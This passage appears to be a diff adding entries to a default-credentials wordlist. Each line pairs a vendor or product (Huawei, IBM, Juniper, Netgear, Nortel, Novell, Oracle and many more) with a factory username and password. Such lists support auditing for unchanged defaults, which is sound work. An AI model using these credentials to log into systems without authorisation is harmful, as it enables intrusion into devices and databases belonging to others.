(web),admin,opsware_admin +HP StoreAll (GUI),ibrix,ibrix +HP StoreAll (Root),root,hpinvent +Huawei,admin,admin +huawei (ssh),admin,admin +huawei (ssh),Admin,admin +huawei (ssh),admin, +huawei (ssh),digicel,digicel +huawei (ssh),telecomadmin,admintelecom +huawei (ssh),user,HuaweiUser +huawei (ssh),user,user +huawei (ssh),vodafone,vodafone +Huawei Technologies Co,admin,admin +Huawei Technologies Co,TMAR#HWMT8007079, +Huawei,TMAR#HWMT8007079, +Hyperic,hqadmin,hqadmin +i2b2 Workbench (mssql),I2b2demodata2,i2b2demodata2 +i2b2 Workbench (mssql),I2b2demodata,i2b2demodata +i2b2 Workbench (mssql),I2b2hive,i2b2hive +i2b2 Workbench (mssql),I2b2metadata2,i2b2metadata2 +i2b2 Workbench (mssql),I2b2metadata,i2b2metadata +i2b2 Workbench (mssql),I2b2workdata2,i2b2workdata2 +i2b2 Workbench (mssql),I2b2workdata,i2b2workdata +iblitzz,admin,admin +IBM,$ALOC$, +IBM,$SRV,$SRV +IBM,11111111,11111111 +IBM,22222222,22222222 +IBM,admin,admin +IBM,admin, +IBM,ADMIN, +IBM,Administrator,admin +IBM,admin,password +IBM,admin,secure +IBM,AP2SVP, +IBM,APL2PP, +IBM,AUTOLOG1, +IBM,BATCH1, +IBM,BATCH2, +IBM,BATCH, +IBM,,admin +IBM,,ascend +IBM,, +IBM,,IBM +IBM,,MBIU0 +IBM,,R1QTPS +IBM,,sertafu +IBM,CCC, +IBM,CICSUSER,CISSUS +IBM,CMSBATCH, +IBM,CMSBATCH,CMSBATCH +IBM,CMSUSER, +IBM,CPNUC, +IBM,CPRM, +IBM,CSPUSER, +IBM,CVIEW, +IBM,DATAMOVE, +IBM,db2fenc1,db2fenc1 +IBM,db2inst1,db2inst1 +IBM,DBDCCICS,DBDCCIC +IBM,DEMO1, +IBM,DEMO2, +IBM,DEMO3, +IBM,DEMO4, +IBM,DIRECT, +IBM,DIRMAINT, +IBM,DISKCNT, +IBM,EREP, +IBM,ESSEX, +IBM,fg_sysadmin,password +IBM,FORSE,FORSE +IBM,FSFADMIN, +IBM,FSFTASK1, +IBM,FSFTASK2, +IBM,GCS, +IBM,guest, +IBM,guest,guest +IBM,hscroot,abc123 +IBM,ibm,2222 +IBM,ibm,password +IBM,ibm,service +IBM,IBMUSER,SYS1 +IBM,IDMS, +IBM,IDMSSE, +IBM,IIPS, +IBM IMM (web),USERID,PASSW0RD +IBM,IPC, +IBM,IPFSERV, +IBM,ISPVM, +IBM,IVPM1, +IBM,IVPM2, +IBM,MAINT, +IBM,MAINT,MAINT +IBM Maximo (mssql),maxadmin,maxadmin +IBM Maximo (mssql),maxreg,maxreg +IBM Maximo (mssql),mxintadm,mxintadm +IBM,MOESERV, +IBM Netezza (web),admin,password +IBM,NEVIEW, +IBM,OLTSEP, +IBM,OP1, +IBM,OPERATIONS,OPERATIONS +IBM,OPERATNS, +IBM,OPERATNS,OPERATNS +IBM,OPERATOR, +IBM,Operator,Operator +IBM,OPER,OPER +IBM,PDMREMI, +IBM,PENG, +IBM,POST,BASE +IBM,PROCAL, +IBM,PRODBM, +IBM,PRODCICS,PRODCICS +IBM,PROG,PROG +IBM,PROMAIL, +IBM,PSFMAINT, +IBM,PVM, +IBM,qpgmr,qpgmr +IBM,qsecofr,11111111 +IBM,qsecofr,22222222 +IBM,qsecofr,qsecofr +IBM,qserv,qserv +IBM,QSRV,11111111 +IBM,QSRV,22222222 +IBM,qsrvbas,qsrvbas +IBM,qsrv,qsrv +IBM,QSRV,QSRV +IBM,qsvr,ibmcel +IBM,qsvr,qsvr +IBM,qsysopr,qsysopr +IBM,quser,quser +IBM,RDM470, +IBM,root, +IBM,root,passw0rd +IBM,ROUTER, +IBM,RSCS, +IBM,RSCSV2, +IBM,SAVSYS, +IBM,secofr,secofr +IBM,sedacm,secacm +IBM,SFCMI, +IBM,SFCNTRL, +IBM,SMART, +IBM,SQLDBA, +IBM,SQLUSER, +IBM,storwatch,specialist +IBM Storwize V7000 Unified (ssh),admin,admin0001 +IBM Storwize V7000 Unified (ssh),root,Passw0rd +IBM Storwize V7000 Unified (ssh),superuser,passw0rd +IBM,superadmin,secret +IBM,SYSADMIN, +IBM,SYSA,SYSA +IBM,SYSCKP, +IBM,SYSDUMP1, +IBM,SYSERR, +IBM,sysopr,sysopr +IBM,SYSWRM, +IBM,TDISK, +IBM,TEMP, +IBM,TSAFVM, +IBM UrbanCode Deploy (web),admin,admin +IBM UrbanCode Deploy (web),ucdpadmin,ucdpadmin +IBM,USERID,PASSW0RD +IBM,USERID,PASSWORD +IBM,user,USERP +IBM,VASTEST, +IBM,VCSRV,VCSRV +IBM,VM3812, +IBM,VMARCH, +IBM,VMASMON, +IBM,VMASSYS, +IBM,VMBACKUP, +IBM,VMBSYSAD, +IBM,VMMAP, +IBM,VMTAPE, +IBM,VMTLIBR, +IBM,VMUTIL, +IBM,VSEIPO, +IBM,VSEMAINT, +IBM,VSEMAN, +IBM,vt100,public +IBM,VTAM, +IBM,VTAMUSER, +IBM,VTAM,VTAM +IBM WAS (mssql),wasadmin,wasadmin +IBM,webadmin,webibm +IBM,wpsadmin,wpsadmin +icatch (camera),admin,123456 +icatch (camera),root,icatch99 +Ichano,,123 +iDirect,admin,P@55w0rd! +iDirect,root,iDirect +iGuard,admin,123 +IHS Kingdom (mssql),sa,$ei$micMicro +IMC Networks,admin,admin +inchon,admin,admin +Inedo,Admin,Admin +infacta,Administrator, +Infoblox,admin, +Informix,informix,informix +Infosmart,admin,0 +Infrant,admin,infrant1 +Innovaphone,admin,ip20 +Innovaphone,admin,ip21 +Innovaphone,admin,ip3000 +Innovaphone,admin,ip305Beheer +Innovaphone,admin,ip400 +Inova,iclock,timely +INOVA,iclock,timely +Integral,Administrator,letmein +Integrated Networks,Administrator,1234 +Integrated Networks,Administrator,12345678 +Integrated Networks,Administrator,19750407 +intel,admin, +intel,, +Intel,,Intel +Intel,,isolation +Intel,,shiva +Intel,Guest, +Intel,intel,intel +intel,khan,kahn +IntelliTouch,administrator,1234 +Intel,NICONEX,NICONEX +intel,root,admin +Intel,root, +Intel,setup,setup +Intel/Shiva,admin,hello +Interbase,SYSDBA,masterkey +iNTERFACEWARE Inc.,admn,password +Intermec,,intermec +Intermec,intermec,intermec +Internet Archive,admin,letmein +Intershop,operator,$chwarzepumpe +Intersystems,system,sys +intex,, +Intracom,admin,admin +Inventel,admin,admin +Inventel Wanadoo,Admin,Admin +ion,Administrator,admin +ion,,admin +ipfire (ssh),admin,admin +ipfire (ssh),admin, +ipfire (ssh),root,admin +iPSTAR,admin,operator +Ipswitch,admin,admin +Ipswitch,guest, +Ipswitch,XXSESS_MGRYY,X#1833 +IQinVision,root,system +iqinvision (web),root,system +IRC,,FOOBAR +Irongate,admin,NetSurvibox +IronPort,admin,ironport +iso sistemi,, +Iwill,,iwill +JAHT,admin,epicrouter +JAMF Software,jamfsoftware,jamfsw03 +Janitza,admin,Janitza +Janitza,guest,Janitza +Janitza,Homepage Password,0th +Janitza,user,Janitza +JasperReports (web),jasperadmin,bitnami +JasperReports (web),jasperadmin,jasperadmin +Jaspersoft Corporation,demo,demo +Jaspersoft Corporation,jasperadmin,jasperadmin +Jaspersoft Corporation,joeuser,joeuser +Jaspersoft Corporation,superuser,superuser +JBoss AS 6 Alt (web),admin,admin +JBoss AS 6 (web),admin,admin +JD Edwards,JDE,JDE +JDE,PRODDTA,PRODDTA +JDS,hydrasna, +JDS Microprocessing,hydrasna, +Jean-Philippe Lang,admin,admin +Jeebles Technology,,admin +Jeedom,jeedom,Mjeedom96 +Jeedom,root,Mjeedom96 +Jenkins (web),, +Jetform,Jetform, +JetWay,,spooml +JFrog,admin,password +JioFi,administrator,administrator +JioFiber,admin,jiocentrum +Johnson Controls,johnson,control +Joss Technology,,57gbzb +Joss Technology,,technolgi +Jovision,admin, +Juniper,admin,abc123 +Juniper,admin,netscreen +Juniper,admin,peribit +Juniper,netscreen,netscreen +Juniper,redline,redline +Juniper ScreenOS/Netscreen (telnet),netscreen,<<< %s(un='%s') = %u +Juniper,serial#,serial# +juniper (ssh),admin,abc123 +Juniper (ssh),admin,abc123 +Juniper (ssh),admin,netscreen +Juniper (ssh),admin,peribit +juniper (ssh),admin,<<< %s(un=\'%s\') = %u. +Juniper (ssh),netscreen,netscreen +Juniper (ssh),redline,redline +Juniper (ssh),serial#,serial# +juniper (ssh),super,juniper123 +Juniper,super,juniper123 +Justin Hagstrom,admin,admin +Justin Hagstrom,test,test +JVC,jvc,skaarhoj +JVC (web),admin,jvc +Kalatel,,3477 +Kalatel,,8111 +Kali linux (OS),kali,kali +Kali linux (OS),root,toor +kali Linux(vagrant),vagrant,vagrant +Kanboard (web),admin,admin +kaptest,admin, +KASDA,admin,adslroot +Kentico Software,administrator, +Kethinov,root,password +Keyscan,keyscan,KEYSCAN +Kloxo,admin,password +Kloxo (DB),,21232f297a +Kloxo,root,password +Kloxo (RoundCube),,pass +Kodak,PACSLinkIP,NetServer +Kodak,PLMIMService,NetServer +Kodak,RNIServiceManager,NetServer +Kodak,SA,PASSWORD +Kodak,Service,Service +Kodi,kodi,kodi +Konica Minolta,admin,administrator +Konica Minolta,,0 +Konica Minolta,,0000 +Konica Minolta,,1234 +Konica Minolta,,1234567812345678 +Konica Minolta,, +Konica Minolta,,MagiMFP +Konica Minolta,,sysadm +Konica Minolta,,sysAdmin +Konica Minolta (web),admin,administrator +Konica Minolta (web),,0 +Konica Minolta (web),,0000 +Konica Minolta (web),,1234 +Konica Minolta (web),,1234567812345678 +Konica Minolta (web),, +Konica Minolta (web),,MagiMFP +Konica Minolta (web),,sysadm +Konica Minolta (web),,sysAdmin +Kramer,Admin,adminpw +Kronos,SuperUser,kronites +KTI,admin,123 +KTI,admin,123456 +KTI,superuser,123456 +Kylin (apache),ADMIN,KYLIN +Kyocera,2800,2800 +Kyocera,admin,admin +Kyocera,admin, +Kyocera,,admin00 +Kyocera,,PASSWORD +Kyocera,root,root +LaCie,admin,admin +LANCOM,, +Lanier,admin, +Lanier,,sysadm +Lanier,supervisor, +Lanner,admin,admin +LANSA,admin,admin +LANSA,dev,dev +LANSA,WEBADM,password +Lantronix,,access +Lantronix,,admin +Lantronix,, +Lantronix,,lantronix +Lantronix,,system +Lantronix,login,access +Lantronix,sysadmin,PASS +Lasa AIMS (mssql),ADMIN,AIMS +Lasa AIMS (mssql),FB,AIMS +latis network,, +LAXO,admin,admin +ldap account manager(lam),lam,lam +Leading Edge,,MASTER +Lenel,admin,admin +Lenel OnGuard (mssql),LENEL,MULTIMEDIA +Level1,admin,admin +Level1,manager,manager +Leviton,admin,leviton +LG,admin,epicrouter +LG,,jannie +LGIC,LR-ISDN,LR-ISDN +LG,vikram,singh +Liebert,Liebert,Liebert +LifeSize,admin,admin +LifeSize,,1234 +LifeSize,support,support +Lindsay Electronics,ADMINISTRATOR,SENTINEL +Lindsay Electronics,SENTINEL,SENTINEL +Linksys,admin,admin +Linksys,admin, +Linksys,Administrator,admin +Linksys,,admin +Linksys,, +Linksys,,epicrouter +Linksys,comcast,1234 +Linksys,root,orion99 +linksys (ssh),admin,admin +linksys (ssh),admin,password +linksys (ssh),linksys, +linksys (ssh),root,admin +Linksys,user,tivonpw +Linux,gonzo, +Linux,root,uClinux +Linux,satan, +Linux,snake, +Liquidware Labs,ssadmin,sspassword +Livingstone,root, +Livingston,!root, +Lockdown,setup,changeme! +LogiLink,admin,1234 +Logitech,,0 +Loglogic,root,logapp +Loglogic,toor,logapp +longshine,admin,0 +Longshine,admin,0 +Lorex,admin,admin +Lucent,admin,AitbISP4eCiG +Lucent,admin,Ascend +Lucent,Administrator, +Lucent,(any 3 characters),cascade +Lucent,(any 3 chars),cascade +Lucent,bciim,bciimpw +Lucent,bcim,bcimpw +Lucent,bcms,bcmspw +Lucent,bcnas,bcnaspw +Lucent,,admin +Lucent,,cascade +Lucent,blue,bluepw +Lucent,browse,browsepw +Lucent,browse,looker +Lucent,craft,craft +Lucent,craft,craftpw +Lucent,cust,custpw +Lucent,enquiry,enquirypw +Lucent,field,support +Lucent,inads,inads +Lucent,inads,indspw +Lucent,init,initpw +Lucent,locate,locatepw +Lucent,LUCENT01,UI-PSWD-01 +Lucent,LUCENT02,UI-PSWD-02 +Lucent,maint,maintpw +Lucent,maint,rwmaint +Lucent,nms,nmspw +Lucent,pw,pwpw +Lucent,rcust,rcustpw +Lucent,readonly,lucenttech2 +Lucent,readwrite,lucenttech1 +Lucent,root,ascend +Lucent,super,super +Lucent,support,supportpw +Lucent,sysadm,admpw +Lucent,sysadm,sysadmpw +Lucent,sysadm,syspw +Lucent,tech,field +Lumens,Admin,password +Luxon Communications,administrator,19750407 +m0n0wall,admin,mono +MachSpeed,,sp99dd +Macromedia,,admin +Macsense,admin,admin +Magento,admin,123123 +Magic-Pro,,prost +Main Street Softworks,MCVEADMIN,password +Makito Decoder (web),admin,%89%F0%01%8F%D0%01%80%F0%01%85%D0%01%83%F0%01%83%E0%01%84%F0%01 +Mambo,admin,admin +ManageEngine,admin,admin +Mandarin Library Automation,admin,boca raton +Mantis,administrator,root +Marantz,,000000 +Marconi,ami, +Marshall Electronics,admin,1234 +maxdata,, +MayGion Camera (webcam),admin,admin +McAfee,admin,admin123 +McAfee,scmadmin,scmchangeme +McAfee,webshield,webshieldchangeme +McData,Administrator,password +McData,McdataSE,redips +MediaPortal (mssql),sa,M3d!aP0rtal +Mediatrix,admin,1234 +Mediatrix,administrator, +medion,,medion +medo.check (mssql),mcUser,medocheck123 +Megastar,,star +meinberg,root,timeserver +Memotec,memotec,supervisor +Mentec,MICRO,RSX +MERCURY,Administrator,admin +Mercury Interactive,admin,admin +Meridian,service,smile +metasploit,msfdev,msfdev +metasploit,msf,msf +Metasploit,postgres,postgres +metro,client,client +Michiel,admin,phplist +Microcom,admin,epicrouter +Microcom,admin,superuser +Microcom,user,password +Micro Focus Silk Central (mssql),sa,SilkCentral12!34 +Micron,,sldkj754 +Micron,,xyzall +Micronet,admin,admin +Micronet,admin,epicrouter +Micronet,mac, +Micronet,root,default +Micronics,,dn_04rjc +Microplex,root,root +microRouter,,letmein +Microsoft,Administrator,Administrator +Microsoft,Administrator, +Microsoft,,admin +Microsoft,, +Microsoft,,sa +Microsoft,Guest, +Microsoft,Guest,Guest +Microsoft,IS_$hostname,IS_$hostname +Microsoft,LDAP_Anonymous,LdapPassword_1 +Microsoft,LessonUser1, +Microsoft,LessonUser2, +Microsoft,MSHOME,MSHOME +Microsoft,sa, +Microsoft,User,User +Mike Peters,bsxuser,bsxpass +Mikrotik,admin, +MikroTik,admin, +Milan,root,root +Minolta PagrPro,,sysadm +Minolta QMS,admin, +Minolta QMS,operator, +Mintel,,SYSTEM +MISP,admin@admin.test,admin +Mitel,, +Mitel,installer,1000 +Mitel Networks,1nstaller,5X2000 +Mitel Networks,installer,sx2000 +Mitel Networks,maint1,sx2000 +Mitel Networks,maint2,sx2000 +Mitel Networks,s1stem,5X2000 +Mitel Networks,system,sx2000 +Mitel,system,mnet +Mitel,system,password +mklencke,root,blablabla +Mobotix,admin,meinsm +mobotix (web),admin,meinsm +modern.ie (ssh),IEUser,D@rj33l1ng +Mole,admin,admin +Mongodb noauth (mongodb),, +Motive,admin,isee +Motorola,admin,motorola +Motorola,admin,password +Motorola,,0000 +motorola,, +Motorola,cablecom,router +Motorola,service,smile +Motorola,setup, +Motorola,technician,yZgO8Bvj +movistar (ssh),1234,1234 +movistar (ssh),admin,admin +MP3Mystic,admin,mp3mystic +mro software,SYSADM,sysadm +MRV,admin,admin +MSSQL (mssql),ADONI,BPMS +MSSQL (mssql),sa, +MSSQL (mssql),sa,password +MSSQL (mssql),sa,Password123 +MSSQL (mssql),sa,sa +MSSQL (mssql),sa,sqlserver +M Technology,,mMmM +MTNL,admin,admin +Mutare,,admin +Muze,admin,muze +MyioSoft,demo,demo +MySQL,admin@example.com,admin +MySQL,root, +MySQL (ssh),root,root +MySQL,superdba,admin +NAI,admin,admin123 +NAI,GlobalAdmin,GlobalAdmin +Nanoteq,admin,NetSeq +Napco Continental Access (mssql),cic,cic +Napco Continental Access (mssql),cic,cic!23456789 +Napco Continental Access (mssql),cic,Cic!23456789 +Napco Continental Access (mssql),sa,cic +Napco Continental Access (mssql),sa,cic!23456789 +Napco Continental Access (mssql),sa,Cic!23456789 +nCircle,root,ciwuxe +NCR,ncrm,ncrm +NEC,admin,password +NEC,, +NEC,,iPbSmNt +Neo4j,neo4j,neo4j +Nessus,admin,admin123 +NetApp,admin,admin123 +NetApp,admin,NetCache +Netasq,admin,admin +NetBackup OpsCenter Analytics (web),admin,password +NetBotz,netbotz,netbotz +Netcomm,admin,password +Netcomm,,admin +Netcomm,user,password +Netcordia,admin,admin +netcore (ssh),admin,admin +netcore (ssh),guest,guest +Netgear,admin,1234 +Netgear,admin,admin +Netgear,admin, +Netgear,admin,draadloos +Netgear,admin,infrant1 +Netgear,admin,netgear1 +Netgear,admin,password +Netgear,Admin,password +Netgear,admin,setup +Netgear,,1234 +Netgear,,admin +Netgear,, +Netgear,,password +Netgear,,private +Netgear,,zebra +Netgear,comcast,1234 +Netgear,cusadmin,highspeed +Netgear,Gearguy,Geardog +Netgear,super,5777364 +Netgear,superman,21241036 +NetGenesis,naadmin,naadmin +NETIO 4All PowerPDU,admin,admin +Netopia,admin, +Netopia,admin,noway +Netopia,, +Netopia,factory,(see note) +Netopia,netopia,netopia +Netport,setup,setup +Netscape,admin,admin +Netscreen,admin, +Netscreen,Administrator, +Netscreen,admin,netscreen +Netscreen,, +Netscreen,netscreen,netscreen +Netscreen,operator, +Netstar,admin,password +netsys (ssh),admin,admin +Network Appliance,admin,NetCache +Network Associates,e250,e250changeme +Network Associates,e500,e500changeme +Network Everywhere,,admin +NetworkICE,iceman, +NetXMS (mssql),admin,netxms +NevisIDM,bootstrap,generated +NewMedia-NET GmbH,root,admin +Nexsan,ADMIN,PASSWORD +NeXT,me, +NeXT,root,NeXT +NeXT,signa,signa +Nexus Repository Manager (web),admin,admin123 +NGSec,admin,asd +NGSec,admin, +NGSEcure,admin,admin +NICE Systems Ltd.,Administrator,nicecti +NICE Systems Ltd.,Nice-admin,nicecti +Niksun,vcr,NetVCR +Nimble,,xdfk9874t3 +Nokia,,9999 +Nokia,,nokai +Nokia,,nokia +Nokia,,Telecom +Nokia,client,client +Nokia,m1122,m1122 +Nokia,nop,12345 +Nokia,nop,123454 +Nokia,root,nokia +Nokia,root,rootme +Nokia,Security Code,12345 +Nokia,telecom,telecom +Nokia,Telecom,Telecom +NOMADIX,admin, +Norstar,**23646,23646 +Norstar,**266344,266344 +Nortel,266344,266344 +Nortel,admin,000000 +Nortel,admin,admin +Nortel,admin,admin000 +Nortel,admin, +Nortel,administrator,PlsChgMe! +Nortel,admin,root +Nortel,admin,setup +Nortel,,0 +Nortel,,266344 +Nortel,, +Nortel,,l1 +Nortel,,l2 +Nortel,,ro +Nortel,,rw +Nortel,,rwa +Nortel,,secure +Nortel,ccrusr,ccrusr +Nortel,conferencing,admin +Nortel,debug,gubed +Nortel,distrib,distrib0 +Nortel,disttech,4tas +Nortel,disttech,disttech +Nortel,disttech,etas +Nortel Integrated Call Director (web),admin,admin +Nortel,l2,l2 +Nortel,l3,l3 +Nortel,login,0 +Nortel,login,0000 +Nortel,login,1111 +Nortel,login,8429 +Nortel,maint,maint +Nortel,maint,ntacdmax +Nortel,Manager, +Nortel,mlusr,mlusr +Nortel,root,3ep5w2u +Nortel,ro,ro +Nortel,rwa,rwa +Nortel,rw,rw +Nortel,service,smile +Nortel,spcl,0 +Nortel,spcl,0000 +Nortel,supervisor,PlsChgMe! +Nortel,supervisor,visor +Nortel,sysadmin,nortel +Nortel,system,adminpwd +Nortel,tasman,tasmannet +Nortel,trmcnfg,trmcnfg +Nortel,user, +Nortel,user,user +Nortel,user,user0000 +Novell,admin,admin +Novell,ADMIN,admin +Novell,ADMIN,ADMIN +Novell,ADMIN, +Novell,admin,novell +Novell,ARCHIVIST,ARCHIVIST +Novell,ARCHIVIST, +Novell,BACKUP,BACKUP +Novell,BACKUP, +Novell,,cr0wmt 911 +Novell,,root +Novell,,san fran 8 +Novell,CHEY_ARCHSVR, +Novell,CHEY_ARCHSVR,CHEY_ARCHSVR +Novell,FAX, +Novell,FAX,FAX +Novell,FAXUSER, +Novell,FAXUSER,FAXUSER +Novell,FAXWORKS, +Novell,FAXWORKS,FAXWORKS +Novell,GATEWAY, +Novell,GATEWAY,GATEWAY +Novell,GUEST, +Novell,GUEST,GUEST +Novell,GUEST,GUESTGUE +Novell,GUEST,GUESTGUEST +Novell,GUEST,TSEUG +Novell,HPLASER, +Novell,HPLASER,HPLASER +Novell,LASER, +Novell,LASER,LASER +Novell,LASERWRITER, +Novell,LASERWRITER,LASERWRITER +Novell,MAIL, +Novell,MAIL,MAIL +Novell,POST, +Novell,POST,POST +Novell,PRINT, +Novell,PRINTER, +Novell,PRINTER,PRINTER +Novell,PRINT,PRINT +Novell,ROOT, +Novell,ROOT,ROOT +Novell,ROUTER, +Novell,SABRE, +Novell,sadmin, +Novell,servlet,manager +Novell,SUPERVISOR, +Novell,SUPERVISOR,HARRIS +Novell,SUPERVISOR,NETFRAME +Novell,SUPERVISOR,NF +Novell,SUPERVISOR,NFI +Novell,SUPERVISOR,SUPERVISOR +Novell,SUPERVISOR,SYSTEM +Novell,TEST, +Novell,TEST,TEST +Novell,USER_TEMPLATE, +Novell,USER_TEMPLATE,USER_TEMPLATE +Novell,WANGTEK, +Novell,WANGTEK,WANGTEK +Novell,WINDOWS_PASSTHRU, +Novell,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU +Novell,WINSABRE,SABRE +Novell,WINSABRE,WINSABRE +NRG or RICOH,,password +NSI,root,nsi +Nullsoft,admin,changeme +Nurit,$system, +Nuxeo Server (general),Administrator,Administrator +OCE,,0 and the number of OCE printer +OCS Inventory,admin,admin +Odoo (general),admin,admin +Odoo (general),demo,demo +ODS,ods,ods +Oki,admin,OkiLAN +Oki,admin, +Oki,root, +Oleg Khabarov,username,password +Olicom,,AaBbCcDd +olitec,admin,adslolitec +olitec (Trendchip),admin,admin +Omnitronix,,SMDR +Omnitronix,,SUPER +OMRON,, +oodie.com,admin,admin +OpenConnect,admin,OCS +OpenConnect,adminstat,OCS +OpenConnect,adminuser,OCS +OpenConnect,adminview,OCS +OpenConnect,helpdesk,OCS +OpenGTS (mssql),gts,opengts +Openlink,admin,admin +OpenMarket,admin,demo +OpenMarket,Bobo,hello +OpenMarket,Coco,hello +OpenMarket,Flo,hello +OpenMarket,Joe,hello +OpenMarket,Moe,hello +OpenMarket,user_analyst,demo +OpenMarket,user_approver,demo +OpenMarket,user_author,demo +OpenMarket,user_checker,demo +OpenMarket,user_designer,demo +OpenMarket,user_editor,demo +OpenMarket,user_expert,demo +OpenMarket,user_marketer,demo +OpenMarket,user_pricer,demo +OpenMarket,user_publisher,demo +OpenNetAdmin,admin,admin +OPEN Networks,root,0P3N +Openwave,cac_admin,cacadmin +Openwave,sys,uplink +Open-Xchange Inc.,mailadmin,secret +OptiLink,e8c,e8c +Optivision,root,mpegvideo +Oracle,ADAMS,WOOD +Oracle,ADLDEMO,ADLDEMO +Oracle,admin,admin +Oracle,admin,adminadmin +Oracle,ADMINISTRATOR,admin +Oracle,ADMINISTRATOR,ADMINISTRATOR +Oracle,ADMIN,JETSPEED +Oracle,admin,security +Oracle,admin,welcome +Oracle,ADMIN,WELCOME +Oracle,ANDY,SWORDFISH +Oracle,AP,AP +Oracle,APPLSYS,APPLSYS +Oracle,APPLSYS,FND +Oracle,APPLSYSPUB,FNDPUB +Oracle,APPS,APPS +Oracle,APPUSER,APPUSER +Oracle,AQ,AQ +Oracle,AQDEMO,AQDEMO +Oracle,AQJAVA,AQJAVA +Oracle,AQUSER,AQUSER +Oracle,AUDIOUSER,AUDIOUSER +Oracle,AURORA$JIS$UTILITY$, +Oracle,AURORA$ORB$UNAUTHENTICATED,INVALID +Oracle,AURORA@ORB@UNAUTHENTICATED,INVALID +Oracle,BC4J,BC4J +Oracle,BLAKE,PAPER +Oracle,, +Oracle,bpel,bpel +Oracle,BRIO_ADMIN,BRIO_ADMIN +Oracle,CATALOG,CATALOG +Oracle,CDEMO82,CDEMO82 +Oracle,CDEMOCOR,CDEMOCOR +Oracle,CDEMORID,CDEMORID +Oracle,CDEMOUCB,CDEMOUCB +Oracle,CENTRA,CENTRA +Oracle,CIDS,CIDS +Oracle,CIS,CIS +Oracle,CISINFO,CISINFO +Oracle,CLARK,CLOTH +Oracle,cn=orcladmin,welcome +Oracle,COMPANY,COMPANY +Oracle,COMPIERE,COMPIERE +Oracle,CQSCHEMAUSER,PASSWORD +Oracle,CSMIG,CSMIG +Oracle,CTXDEMO,CTXDEMO +Oracle,CTXSYS, +Oracle,CTXSYS,CTXSYS +Oracle,DBI,MUMBLEFRATZ +Oracle,DBSNMP,DBSNMP +Oracle,DEMO8,DEMO8 +Oracle,DEMO9,DEMO9 +Oracle,demo,demo +Oracle,DEMO,DEMO +Oracle,DES,DES +Oracle,DEV2000_DEMOS,DEV2000_DEMOS +Oracle,DIP,DIP +Oracle,DISCOVERER_ADMIN,DISCOVERER_ADMIN +Oracle,DSGATEWAY,DSGATEWAY +Oracle,DSSYS,DSSYS +Oracle,EJSADMIN,EJSADMIN +Oracle,EMP,EMP +Oracle,ESTOREUSER,ESTORE +Oracle,EVENT,EVENT +Oracle,EXFSYS,EXFSYS +Oracle,FINANCE,FINANCE +Oracle,FND,FND +Oracle,FROSTY,SNOWMAN +Oracle Glassfish (web),admin,admin +Oracle Glassfish (web),admin, +Oracle,GL,GL +Oracle,GPFD,GPFD +Oracle,GPLD,GPLD +Oracle,HCPARK,HCPARK +Oracle,HLW,HLW +Oracle,HR,HR +Oracle,ilom-admin,ilom-admin +Oracle,ilom-operator,ilom-operator +Oracle,IMAGEUSER,IMAGEUSER +Oracle,IMEDIA,IMEDIA +Oracle,internal,oracle +Oracle,JMUSER,JMUSER +Oracle,joe,password +Oracle,JONES,STEEL +Oracle,JWARD,AIROPLANE +Oracle,L2LDEMO,L2LDEMO +Oracle,LBACSYS,LBACSYS +Oracle,LIBRARIAN,SHELVES +Oracle,mary,password +Oracle,MASTER,PASSWORD +Oracle,MDDEMO_CLERK,CLERK +Oracle,MDDEMO,MDDEMO +Oracle,MDDEMO_MGR,MGR +Oracle,MDSYS,MDSYS +Oracle,MFG,MFG +Oracle,MGWUSER,MGWUSER +Oracle,MIGRATE,MIGRATE +Oracle,MILLER,MILLER +Oracle,MMO2,MMO2 +Oracle,MODTEST,YES +Oracle,MOREAU,MOREAU +Oracle,MTSSYS,MTSSYS +Oracle,MTS_USER,MTS_PASSWORD +Oracle,MTYSYS,MTYSYS +Oracle,MXAGENT,MXAGENT +Oracle,NAMES,NAMES +Oracle,nm2user,nm2user +Oracle,OAS_PUBLIC,OAS_PUBLIC +Oracle,OCITEST,OCITEST +Oracle,ODM_MTR,MTRPW +Oracle,ODM,ODM +Oracle,ODSCOMMON,ODSCOMMON +Oracle,ODS,ODS +Oracle,OEMADM,OEMADM +Oracle,OEMREP,OEMREP +Oracle,OE,OE +Oracle,OLAPDBA,OLAPDBA +Oracle,OLAPSVR,INSTANCE +Oracle,OLAPSYS,MANAGER +Oracle,OMWB_EMULATION,ORACLE +Oracle,OO,OO +Oracle,OPENSPIRIT,OPENSPIRIT +Oracle,ORACACHE,(random password) +Oracle,oracle,oracle +Oracle,ORAREGSYS,ORAREGSYS +Oracle,ORASSO,ORASSO +Oracle,ORDPLUGINS,ORDPLUGINS +Oracle,ORDSYS,ORDSYS +Oracle,OSE$HTTP$ADMIN,(random password) +Oracle,OSP22,OSP22 +Oracle,OUTLN,OUTLN +Oracle,OWA,OWA +Oracle,OWA_PUBLIC,OWA_PUBLIC +Oracle,OWNER,OWNER +Oracle,PANAMA,PANAMA +Oracle,PATROL,PATROL +Oracle,PERFSTAT,PERFSTAT +Oracle,PLEX,PLEX +Oracle,PLSQL,SUPERSECRET +Oracle,PM,PM +Oracle,PO7,PO7 +Oracle,PO8,PO8 +Oracle,PO,PO +Oracle,PORTAL30_DEMO,PORTAL30_DEMO +Oracle,PORTAL30,PORTAL30 +Oracle,PORTAL30,PORTAL31 +Oracle,PORTAL30_PUBLIC,PORTAL30_PUBLIC +Oracle,PORTAL30_SSO,PORTAL30_SSO +Oracle,PORTAL30_SSO_PS,PORTAL30_SSO_PS +Oracle,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC +Oracle,POWERCARTUSER,POWERCARTUSER +Oracle,PRIMARY,PRIMARY +Oracle,PUBSUB1,PUBSUB1 +Oracle,PUBSUB,PUBSUB +Oracle,QDBA,QDBA +Oracle,QS_ADM,QS_ADM +Oracle,QS_CBADM,QS_CBADM +Oracle,QS_CB,QS_CB +Oracle,QS_CS,QS_CS +Oracle,QS_ES,QS_ES +Oracle,QS_OS,QS_OS +Oracle,QS,QS +Oracle,QS_WS,QS_WS +Oracle,REPADMIN,REPADMIN +Oracle,REP_MANAGER,DEMO +Oracle,REPORTS_USER,OEM_TEMP +Oracle,REP_OWNER,DEMO +Oracle,REP_OWNER,REP_OWNER +Oracle,RE,RE +Oracle,RMAIL,RMAIL +Oracle,RMAN,RMAN +Oracle,SAMPLE,SAMPLE +Oracle,SAP,SAPR3 +Oracle,SCOTT,TIGER +Oracle,scott,tiger or tigger +Oracle,SDOS_ICSAP,SDOS_ICSAP +Oracle,SECDEMO,SECDEMO +Oracle,SERVICECONSUMER1,SERVICECONSUMER1 +Oracle,SH,SH +Oracle,siteadmin,siteadmin +Oracle,SITEMINDER,SITEMINDER 